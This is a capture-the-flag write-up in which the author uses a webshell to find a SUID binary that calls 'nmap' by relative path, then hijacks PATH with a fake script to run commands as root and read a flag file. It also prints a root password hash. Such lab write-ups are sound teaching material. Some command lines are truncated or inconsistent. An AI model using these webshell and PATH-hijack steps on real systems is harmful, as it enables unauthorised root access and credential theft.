CDDC 2018: Great Shot Kid

Category: Kamikaze Points: 271 Description:

  1. Inside the target 10.50.199.12, escalate your privilege level and obtain root access, i.e. become root.
  2. Access the ' /root ' directory on the target 10.50.199.12 and identify the file with permission bits set to -r-------- .
  3. Access the file, identify the correct string within the file and enter it into the response field below.
  4. Submit the Kamikaze Challenge by clicking on the Submit button.

Write-Up

So, with the webshell we obtained from the last challenge, we can now start to explore the playing field. Firstly, as this is CDDC and not Defcon, I start out immediately by looking for SUID binaries.

root@ctf:~# proxychains4 curl 'http://10.50.199.12/project/logos_clie--data 'cmd=find / -user root -perm -4000'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
/usr/sbin/userhelper
/usr/sbin/usernetctl
/usr/sbin/suexec
/usr/libexec/polkit-1/polkit-agent-helper-1
/usr/libexec/pt_chown
/usr/libexec/openssh/ssh-keysign
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/staprun
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/at
/usr/bin/crontab
/usr/bin/chage
/usr/bin/gpasswd
/sbin/pam_timestamp_check
/sbin/unix_chkpwd
/home/scan_host
/lib64/dbus-1/dbus-daemon-launch-helper
/bin/ping6
/bin/mount
/bin/umount
/bin/su
/bin/ping

Immediately, something out of the ordinary popped up, as /home/scan_host. What could this be? Let's try and output the binary as base64 and open it up with our favourite reverse engineering tool, radare2.

root@ctf:~# proxychains4 curl 'http://10.50.199.12/project/logos_clients/1--data 'cmd=cat /home/scan_host | base64'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAIARAAAAAAABAAAAAAAAAAAgKAAAAAAAAAAAAAEAAOAAI
AEAAHgAbAAYAAAAFAAAAQAAAAAAAAABAAEAAAAAAAEAAQAAAAAAAwAEAAAAAAADAAQAAAAAAAAgA
AAAAAAAAAwAAAAQAAAAAAgAAAAAAAAACQAAAAAAAAAJAAAAAAAAcAAAAAAAAABwAAAAAAAAAAQAA
AAAAAAABAAAABQAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAOQGAAAAAAAA5AYAAAAAAAAAACAA
AAAAAAEAAAAGAAAA6AYAAAAAAADoBmAAAAAAAOgGYAAAAAAA9AEAAAAAAAAIAgAAAAAAAAAAIAAA
AAAAAgAAAAYAAAAQBwAAAAAAABAHYAAAAAAAEAdgAAAAAACQAQAAAAAAAJABAAAAAAAACAAAAAAA
AAAEAAAABAAAABwCAAAAAAAAHAJAAAAAAAAcAkAAAAAAAEQAAAAAAAAARAAAAAAAAAAEAAAAAAAA
AFDldGQEAAAAQAYAAAAAAABABkAAAAAAAEAGQAAAAAAAJAAAAAAAAAAkAAAAAAAAAAQAAAAAAAAA
UeV0ZAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAv
bGliNjQvbGQtbGludXgteDg2LTY0LnNvLjIABAAAABAAAAABAAAAR05VAAAAAAACAAAABgAAABIA
AAAEAAAAFAAAAAMAAABHTlUAnjaINzL1pE5Y734sW0f88gg/BI8BAAAAAQAAAAEAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAgAAAAAAAAAAAAAAAAAAAA
AAAAACgAAAASAAAAAAAAAAAAAAAAAAAAAAAAACEAAAASAAAAAAAAAAAAAAAAAAAAAAAAABoAAAAS
AAAAAAAAAAAAAAAAAAAAAAAAAABfX2dtb25fc3RhcnRfXwBsaWJjLnNvLjYAc2V0dWlkAHN5c3Rl
bQBfX2xpYmNfc3RhcnRfbWFpbgBHTElCQ18yLjIuNQAAAAAAAgACAAIAAQABABAAAAAQAAAAAAAA
AHUaaQkAAAIAOgAAAAAAAACgCGAAAAAAAAYAAAABAAAAAAAAAAAAAADACGAAAAAAAAcAAAACAAAA
AAAAAAAAAADICGAAAAAAAAcAAAADAAAAAAAAAAAAAADQCGAAAAAAAAcAAAAEAAAAAAAAAAAAAABI
g+wI6HsAAADoCgEAAOj1AQAASIPECMP/NcoEIAD/JcwEIAAPH0AA/yXKBCAAaAAAAADp4P////8l
wgQgAGgBAAAA6dD/////JboEIABoAgAAAOnA////Me1JidFeSIniSIPk8FBUScfAMAVAAEjHwUAF
QABIx8cEBUAA6Kf////0kJBIg+wISIsFSQQgAEiFwHQC/9BIg8QIw5CQkJCQkJCQkJCQkJBVSInl
U0iD7AiAPWAEIAAAdUu7AAdgAEiLBVoEIABIgev4BmAASMH7A0iD6wFIOdhzJGYPH0QAAEiDwAFI
iQU1BCAA/xTF+AZgAEiLBScEIABIOdhy4sYFEwQgAAFIg8QIW8nDZmZmLg8fhAAAAAAASIM9IAIg
AABVSInldBK4AAAAAEiFwHQIvwgHYADJ/+DJw5CQVUiJ5b8AAAAA6P7+//+/KAZAAOjk/v//uAAA
AADJw5CQkJCQkJCQkJCQkJDzw2ZmZmZmLg8fhAAAAAAASIlsJNhMiWQk4EiNLZMBIABMjSWMASAA
TIlsJOhMiXQk8EyJfCT4SIlcJNBIg+w4TCnlQYn9SYn2SMH9A0mJ1+hD/v//SIXtdBwx2w8fQABM
ifpMifZEie9B/xTcSIPDAUg563LqSItcJAhIi2wkEEyLZCQYTItsJCBMi3QkKEyLfCQwSIPEOMOQ
kJCQkJCQVUiJ5VNIg+wISIsFCAEgAEiD+P90GbvoBmAADx9EAABIg+sI/9BIiwNIg/j/dfFIg8QI
W8nDkJBIg+wI6F/+//9Ig8QIwwAAAQACAAAAAAAAAAAAAAAAAG5tYXAgLXNUIDEwLjUwLjE5OS4x
OTkAAAEbAzskAAAAAwAAAMT+//9AAAAA8P7//2AAAAAA////eAAAAAAAAAAUAAAAAAAAAAF6UgAB
eBABGwwHCJABAAAcAAAAHAAAAHz+//8fAAAAAEEOEIYCQw0GWgwHCAAAABQAAAA8AAAAiP7//wIA
AAAAAAAAAAAAACQAAABUAAAAgP7//4kAAAAAUYwFhgZfDkCDB48CjgONBAJYDggAAAAAAAAAAAAA
AP//////////AAAAAAAAAAD//////////wAAAAAAAAAAAAAAAAAAAAABAAAAAAAAABAAAAAAAAAA
DAAAAAAAAADIA0AAAAAAAA0AAAAAAAAACAZAAAAAAAD1/v9vAAAAAGACQAAAAAAABQAAAAAAAAD4
AkAAAAAAAAYAAAAAAAAAgAJAAAAAAAAKAAAAAAAAAEYAAAAAAAAACwAAAAAAAAAYAAAAAAAAABUA
AAAAAAAAAAAAAAAAAAADAAAAAAAAAKgIYAAAAAAAAgAAAAAAAABIAAAAAAAAABQAAAAAAAAABwAA
AAAAAAAXAAAAAAAAAIADQAAAAAAABwAAAAAAAABoA0AAAAAAAAgAAAAAAAAAGAAAAAAAAAAJAAAA
AAAAABgAAAAAAAAA/v//bwAAAABIA0AAAAAAAP///28AAAAAAQAAAAAAAADw//9vAAAAAD4DQAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQB2AAAAAA
AAAAAAAAAAAAAAAAAAAAAAD2A0AAAAAAAAYEQAAAAAAAFgRAAAAAAAAAAAAAR0NDOiAoR05VKSA0
LjQuNyAyMDEyMDMxMyAoUmVkIEhhdCA0LjQuNy0xOCkAAC5zeW10YWIALnN0cnRhYgAuc2hzdHJ0
YWIALmludGVycAAubm90ZS5BQkktdGFnAC5ub3RlLmdudS5idWlsZC1pZAAuZ251Lmhhc2gALmR5
bnN5bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsYS5keW4ALnJlbGEu
cGx0AC5pbml0AC50ZXh0AC5maW5pAC5yb2RhdGEALmVoX2ZyYW1lX2hkcgAuZWhfZnJhbWUALmN0
b3JzAC5kdG9ycwAuamNyAC5keW5hbWljAC5nb3QALmdvdC5wbHQALmRhdGEALmJzcwAuY29tbWVu
dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAABsAAAABAAAAAgAAAAAAAAAAAkAAAAAAAAACAAAAAAAAHAAAAAAAAAAAAAAAAAAA
AAEAAAAAAAAAAAAAAAAAAAAjAAAABwAAAAIAAAAAAAAAHAJAAAAAAAAcAgAAAAAAACAAAAAAAAAA
AAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAMQAAAAcAAAACAAAAAAAAADwCQAAAAAAAPAIAAAAAAAAk
AAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAEQAAAD2//9vAgAAAAAAAABgAkAAAAAAAGAC
AAAAAAAAHAAAAAAAAAAFAAAAAAAAAAgAAAAAAAAAAAAAAAAAAABOAAAACwAAAAIAAAAAAAAAgAJA
AAAAAACAAgAAAAAAAHgAAAAAAAAABgAAAAEAAAAIAAAAAAAAABgAAAAAAAAAVgAAAAMAAAACAAAA
AAAAAPgCQAAAAAAA+AIAAAAAAABGAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAF4AAAD/
//9vAgAAAAAAAAA+A0AAAAAAAD4DAAAAAAAACgAAAAAAAAAFAAAAAAAAAAIAAAAAAAAAAgAAAAAA
AABrAAAA/v//bwIAAAAAAAAASANAAAAAAABIAwAAAAAAACAAAAAAAAAABgAAAAEAAAAIAAAAAAAA
AAAAAAAAAAAAegAAAAQAAAACAAAAAAAAAGgDQAAAAAAAaAMAAAAAAAAYAAAAAAAAAAUAAAAAAAAA
CAAAAAAAAAAYAAAAAAAAAIQAAAAEAAAAAgAAAAAAAACAA0AAAAAAAIADAAAAAAAASAAAAAAAAAAF
AAAADAAAAAgAAAAAAAAAGAAAAAAAAACOAAAAAQAAAAYAAAAAAAAAyANAAAAAAADIAwAAAAAAABgA
AAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAiQAAAAEAAAAGAAAAAAAAAOADQAAAAAAA4AMA
AAAAAABAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAQAAAAAAAAAJQAAAABAAAABgAAAAAAAAAgBEAA
AAAAACAEAAAAAAAA6AEAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAACaAAAAAQAAAAYAAAAA
AAAACAZAAAAAAAAIBgAAAAAAAA4AAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAoAAAAAEA
AAACAAAAAAAAABgGQAAAAAAAGAYAAAAAAAAnAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAA
AKgAAAABAAAAAgAAAAAAAABABkAAAAAAAEAGAAAAAAAAJAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAA
AAAAAAAAAAC2AAAAAQAAAAIAAAAAAAAAaAZAAAAAAABoBgAAAAAAAHwAAAAAAAAAAAAAAAAAAAAI
AAAAAAAAAAAAAAAAAAAAwAAAAAEAAAADAAAAAAAAAOgGYAAAAAAA6AYAAAAAAAAQAAAAAAAAAAAA
AAAAAAAACAAAAAAAAAAAAAAAAAAAAMcAAAABAAAAAwAAAAAAAAD4BmAAAAAAAPgGAAAAAAAAEAAA
AAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAADOAAAAAQAAAAMAAAAAAAAACAdgAAAAAAAIBwAA
AAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAA0wAAAAYAAAADAAAAAAAAABAHYAAA
AAAAEAcAAAAAAACQAQAAAAAAAAYAAAAAAAAACAAAAAAAAAAQAAAAAAAAANwAAAABAAAAAwAAAAAA
AACgCGAAAAAAAKAIAAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADhAAAAAQAA
AAMAAAAAAAAAqAhgAAAAAACoCAAAAAAAADAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA
6gAAAAEAAAADAAAAAAAAANgIYAAAAAAA2AgAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAA
AAAAAAAAAPAAAAAIAAAAAwAAAAAAAADgCGAAAAAAANwIAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAgA
AAAAAAAAAAAAAAAAAAD1AAAAAQAAADAAAAAAAAAAAAAAAAAAAADcCAAAAAAAAC0AAAAAAAAAAAAA
AAAAAAABAAAAAAAAAAEAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAACQkAAAAAAAD+AAAA
AAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAAAAAAAAAAAIgRAAAA
AAAAGAYAAAAAAAAdAAAALgAAAAgAAAAAAAAAGAAAAAAAAAAJAAAAAwAAAAAAAAAAAAAAAAAAAAAA
AACgFwAAAAAAAAsCAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAMAAQAAAkAAAAAAAAAAAAAAAAAAAAAAAAMAAgAcAkAAAAAAAAAAAAAAAAAA
AAAAAAMAAwA8AkAAAAAAAAAAAAAAAAAAAAAAAAMABABgAkAAAAAAAAAAAAAAAAAAAAAAAAMABQCA
AkAAAAAAAAAAAAAAAAAAAAAAAAMABgD4AkAAAAAAAAAAAAAAAAAAAAAAAAMABwA+A0AAAAAAAAAA
AAAAAAAAAAAAAAMACABIA0AAAAAAAAAAAAAAAAAAAAAAAAMACQBoA0AAAAAAAAAAAAAAAAAAAAAA
AAMACgCAA0AAAAAAAAAAAAAAAAAAAAAAAAMACwDIA0AAAAAAAAAAAAAAAAAAAAAAAAMADADgA0AA
AAAAAAAAAAAAAAAAAAAAAAMADQAgBEAAAAAAAAAAAAAAAAAAAAAAAAMADgAIBkAAAAAAAAAAAAAA
AAAAAAAAAAMADwAYBkAAAAAAAAAAAAAAAAAAAAAAAAMAEABABkAAAAAAAAAAAAAAAAAAAAAAAAMA
EQBoBkAAAAAAAAAAAAAAAAAAAAAAAAMAEgDoBmAAAAAAAAAAAAAAAAAAAAAAAAMAEwD4BmAAAAAA
AAAAAAAAAAAAAAAAAAMAFAAIB2AAAAAAAAAAAAAAAAAAAAAAAAMAFQAQB2AAAAAAAAAAAAAAAAAA
AAAAAAMAFgCgCGAAAAAAAAAAAAAAAAAAAAAAAAMAFwCoCGAAAAAAAAAAAAAAAAAAAAAAAAMAGADY
CGAAAAAAAAAAAAAAAAAAAAAAAAMAGQDgCGAAAAAAAAAAAAAAAAAAAAAAAAMAGgAAAAAAAAAAAAAA
AAAAAAAAAQAAAAIADQBMBEAAAAAAAAAAAAAAAAAAEQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAHAAA
AAEAEgDoBmAAAAAAAAAAAAAAAAAAKgAAAAEAEwD4BmAAAAAAAAAAAAAAAAAAOAAAAAEAFAAIB2AA
AAAAAAAAAAAAAAAARQAAAAIADQBwBEAAAAAAAAAAAAAAAAAAWwAAAAEAGQDgCGAAAAAAAAEAAAAA
AAAAagAAAAEAGQDoCGAAAAAAAAgAAAAAAAAAeAAAAAIADQDgBEAAAAAAAAAAAAAAAAAAEQAAAAQA
8f8AAAAAAAAAAAAAAAAAAAAAhAAAAAEAEgDwBmAAAAAAAAAAAAAAAAAAkQAAAAEAEQDgBkAAAAAA
AAAAAAAAAAAAnwAAAAEAFAAIB2AAAAAAAAAAAAAAAAAAqwAAAAIADQDQBUAAAAAAAAAAAAAAAAAA
wQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAzQAAAAEAFwCoCGAAAAAAAAAAAAAAAAAA4wAAAAAAEgDk
BmAAAAAAAAAAAAAAAAAA9AAAAAAAEgDkBmAAAAAAAAAAAAAAAAAABwEAAAEAFQAQB2AAAAAAAAAA
AAAAAAAAEAEAACAAGADYCGAAAAAAAAAAAAAAAAAAGwEAABIADQAwBUAAAAAAAAIAAAAAAAAAKwEA
ABIADQAgBEAAAAAAAAAAAAAAAAAAMgEAACAAAAAAAAAAAAAAAAAAAAAAAAAAQQEAACAAAAAAAAAA
AAAAAAAAAAAAAAAAVQEAABIADgAIBkAAAAAAAAAAAAAAAAAAWwEAABIAAAAAAAAAAAAAAAAAAAAA
AAAAegEAABIAAAAAAAAAAAAAAAAAAAAAAAAAjgEAABIAAAAAAAAAAAAAAAAAAAAAAAAAogEAABEA
DwAYBkAAAAAAAAQAAAAAAAAAsQEAABAAGADYCGAAAAAAAAAAAAAAAAAAvgEAABECDwAgBkAAAAAA
AAAAAAAAAAAAywEAABECEwAAB2AAAAAAAAAAAAAAAAAA2AEAABIADQBABUAAAAAAAIkAAAAAAAAA
6AEAABAA8f/cCGAAAAAAAAAAAAAAAAAA9AEAABAA8f/wCGAAAAAAAAAAAAAAAAAA+QEAABAA8f/c
CGAAAAAAAAAAAAAAAAAAAAIAABIADQAEBUAAAAAAAB8AAAAAAAAABQIAABIACwDIA0AAAAAAAAAA
AAAAAAAAAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJ
U1RfXwBfX0pDUl9MSVNUX18AX19kb19nbG9iYWxfZHRvcnNfYXV4AGNvbXBsZXRlZC42MzUyAGR0
b3JfaWR4LjYzNTQAZnJhbWVfZHVtbXkAX19DVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1Jf
RU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AHNjYW5faG9zdC5jAF9HTE9CQUxfT0ZGU0VUX1RB
QkxFXwBfX2luaXRfYXJyYXlfZW5kAF9faW5pdF9hcnJheV9zdGFydABfRFlOQU1JQwBkYXRhX3N0
YXJ0AF9fbGliY19jc3VfZmluaQBfc3RhcnQAX19nbW9uX3N0YXJ0X18AX0p2X1JlZ2lzdGVyQ2xh
c3NlcwBfZmluaQBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4yLjUAc3lzdGVtQEBHTElCQ18y
LjIuNQBzZXR1aWRAQEdMSUJDXzIuMi41AF9JT19zdGRpbl91c2VkAF9fZGF0YV9zdGFydABfX2Rz
b19oYW5kbGUAX19EVE9SX0VORF9fAF9fbGliY19jc3VfaW5pdABfX2Jzc19zdGFydABfZW5kAF9l
ZGF0YQBtYWluAF9pbml0AA==

Loading that up into radare2, we get,

root@ctf:~# r2 ex
r_config_set: variable 'asm.cmtright' not found
[r] Cannot open 'ex'
root@ctf:~# r2 executable 
r_config_set: variable 'asm.cmtright' not found
 -- Review all the subcommands of aa to see better ways to analyze your targets.
[0x00400420]> aaaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Emulate code to find computed references (aae)
[x] Analyze consecutive function (aat)
[x] Constructing a function name for fcn.* and sym.func.* functions (aan)
[x] Type matching analysis for all functions (afta)
[0x00400420]> iz
000 0x00000628 0x00400628  22  23 (.rodata) ascii nmap -sT 10.50.199.199

Immediately, we find nmap. Well, given that this is not an absolute path, perhaps it has to do with just that environmental variable, $PATH. If we override that, and create a file nmap in our local directory, we can execute our file as root!

root@ctf:~# proxychains4 curl 'http://10.50.199.12/project/logos_clients/1.php' --data $'cmd=echo "#!/bin/sh\necho \$(id)" > nmap'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.12
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.50.199.12:80  ...  OK
root@ctf:~# proxychains4 curl 'http://10.50.199.12/project/logos_clients/1.php' --data 'cmd=PATH=./:$PATH /home/scan_host'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.12
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.50.199.12:80  ...  OK
uid=0(root) gid=48(apache) groups=48(apache)

Look at that! We've successfully ran the script as root! As the challenge asks us to take a look at the /root directory, let's modify our script a little and take a look inside,

root@ctf:~# proxychains4 curl 'http://10.50.199.12/project/logos_clients/1.php' --data $'cmd=echo "#!/bin/sh\necho \$(ls -lah /root)" > nmap'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.12
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.50.199.12:80  ...  OK
root@ctf:~# proxychains4 curl 'http://10.50.199.12/project/logos_clients/1.php' --data 'cmd=PATH=./:$PATH /home/scan_host'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.12
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.50.199.12:80  ...  OK
total 44K
dr-xr-x---. 4 root root 4.0K Feb 13 04:54 . dr-xr-xr-x. 24 root root 4.0K May 31 10:37 .. -rw-------. 1 root root 97 Feb 13 04:55 .bash_history -rw-r--r--. 1 root root 18 May 20 2009 .bash_logout -rw-r--r--. 1 root root 176 May 20 2009 .bash_profile -rw-r--r--. 1 root root 176 Sep 23 2004 .bashrc -rw-r--r--. 1 root root 100 Sep 23 2004 .cshrc drwxr-----. 3 root root 4.0K Jan 30 08:27 .pki drwx------. 2 root root 4.0K May 31 08:40 .ssh -rw-r--r--. 1 root root 129 Dec 3 2004 .tcshrc -r-------- 1 root root 24 Feb 13 04:54 evidence

Granted the output is a mess, we can see immediately our desired file /root/evidence with the permission -r--------. Let's see if we can print our secret out!

root@ctf:~# proxychains4 curl 'http://10.50.199.12/project/logos_clients/1.php' --data $'cmd=echo "#!/bin/sh\necho \$(cat /root/evidence)" > nmap'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.12
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.50.199.12:80  ...  OK
root@ctf:~# proxychains4 curl 'http://10.50.199.12/project/logos_client/1.php' --data 'cmd=PATH=./:$PATH /home/scan_host'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.12
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.50.199.12:80  ...  OK
Woohoo !! I've got root

Interestingly, we can also try and crack the password of root,

root:$6$XOoulAkw$rR9uvNkigO/wlJEHxRydME8dZdwov7QQ59TLEnB/28rEJyWu5F7129xWwqRXdJ/V1/ipISd6fsFFhYeN7TqJO.:0:0:root:/root:/bin/bash
root:

Therefore, the flag is Woohoo !! I've got root

results matching ""

    No results matching ""